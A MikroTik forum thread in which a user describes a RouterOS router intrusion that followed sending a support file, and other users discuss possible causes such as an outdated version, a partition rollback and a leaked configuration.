Community discussions

MikroTik App
 
lrl
newbie
Topic Author
Posts: 25
Joined: Sat Sep 28, 2013 10:31 am

Intrusion shortly after sending support file

Sun Jul 22, 2018 12:01 pm

Has anyone else experienced a routerOS intrusion nearly immediately after sending support a supfile? Yesterday I sent support a support file after we'd had several kernel panic crashes and within about 2.5 hours someone managed to log into the router using my credentials on the first attempt using the only service/port available from the outside world. I reviewed gathered logs for the last month and not a single hint of anyone poking around till then.

The attacker logged in via winbox, turned on socks, created a script, and scheduled the script to download a php file from a remote server.

Considering how tightly we control our security and how that account is never used, in fact going back to the router in question that login has never been used since inception as it was a backup full access local user. I'm really quite concerned here.
Last edited by lrl on Wed Aug 08, 2018 7:04 am, edited 1 time in total.
 
User avatar
tomaskir
Trainer
Trainer
Posts: 1162
Joined: Sat Sep 24, 2011 2:32 pm
Location: Slovakia

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 12:47 pm

1) What version of RouterOS was that router on?
2) Did you have Winbox open publicly on the default port?
 
nikc
Member Candidate
Member Candidate
Posts: 208
Joined: Wed Jul 13, 2016 6:05 pm

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 4:41 pm

The implications of whats been said here are pretty huge, i trust you picked this up with support before publicly posting this ?
 
User avatar
vecernik87
Forum Veteran
Forum Veteran
Posts: 882
Joined: Fri Nov 10, 2017 8:19 am

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 5:19 pm

The implication is actually not that big, if you consider there was suddenly several kernel panics out of blue sky.
This might be also connected to someone fully utilizing system resources, causing kernel panic, disabling some critical subsystem and allowing attacker to gain access.
It is really unusual that kernel panics will happen just like that.
 
msatter
Forum Guru
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 6:16 pm

TS did not state the version of RouterOS so it looks more like this:

viewtopic.php?f=21&t=133533

I hope that information page about vulnerabilities and how to solve will be soon available.
 
lrl
newbie
Topic Author
Posts: 25
Joined: Sat Sep 28, 2013 10:31 am

Re: Intrusion shortly after sending support file

Sun Jul 22, 2018 7:37 pm

We were running a vulnerable version 6.39.3, but all ports were firewalled off and port knocking used to access winbox and that's where I'm a little freaked out. I can't figure out how those details could have gotten out there without a loss of control of the config.

There are some strange events circling this router, as our maintenance log shows it was upgraded to 6.40.8 on April 24th but the router logs don't support that.

To be clear here, I'm not blaming or trying to blame mikrotik support, but I'm concerned that there could be an e-mail related security issue here. I'm also not 100% sure if all the details necessary for this would be in a support file.

If it's a coincident, I'm speechless.

I'm embarrass to say that after looking much closer I believe the kernel panics may have been related to having the CPU overclocked...
 
User avatar
vecernik87
Forum Veteran
Forum Veteran
Posts: 882
Joined: Fri Nov 10, 2017 8:19 am

Re: Intrusion shortly after sending support file

Tue Jul 24, 2018 5:41 am

Hi,
I was just reading through some other report and I realized there might be connection. His router was crashing due to insufficient memory and later he found device compromised.
Are you 100% positive that your router was crashing due to overclocked CPU and not due to running out of memory? Also, did you get any reponse from support@ ?
Similarity of these reports is too high to be just ignored.
 
lrl
newbie
Topic Author
Posts: 25
Joined: Sat Sep 28, 2013 10:31 am

Re: Intrusion shortly after sending support file

Tue Jul 24, 2018 10:28 am

I've reviewed all our dude data on this router, back to inception as there is zero evidence that anyone had access prior to. This is a ccr1072 there's pretty much zero chance.

The reference report is what was installed on our router with the access.
 
pe1chl
Forum Guru
Forum Guru
Posts: 10195
Joined: Mon Jun 08, 2015 12:09 pm

Re: Intrusion shortly after sending support file

Tue Jul 24, 2018 10:43 am

There are some strange events circling this router, as our maintenance log shows it was upgraded to 6.40.8 on April 24th but the router logs don't support that.
Are you running a 2-partition setup where the 6.39.2 was still in the inactive partition?
I have setup 2 partitions on all routers that support it, and normally just before upgrading I copy the active partition.
This already has saved me when an upgrade did not go as planned, as the router switches to the copied partition and continues to function.
However, it also caused an unplanned switch back to the older version when at one site the power failed, came back a few seconds, then failed again.
The router then switched to the older version because the startup was not completed.
Also, when there are intruders they could see your older version and switch to that to gain easier access.

Of course, when your support file is leaked, others can use it to gain knowledge about your router (like the port knocking setup).
This could also be caused by a compromise elsewhere in your environment, e.g. the admin's mail account having been hacked.

Who is online

Users browsing this forum: Ahrefs [Bot], sybadi and 69 guests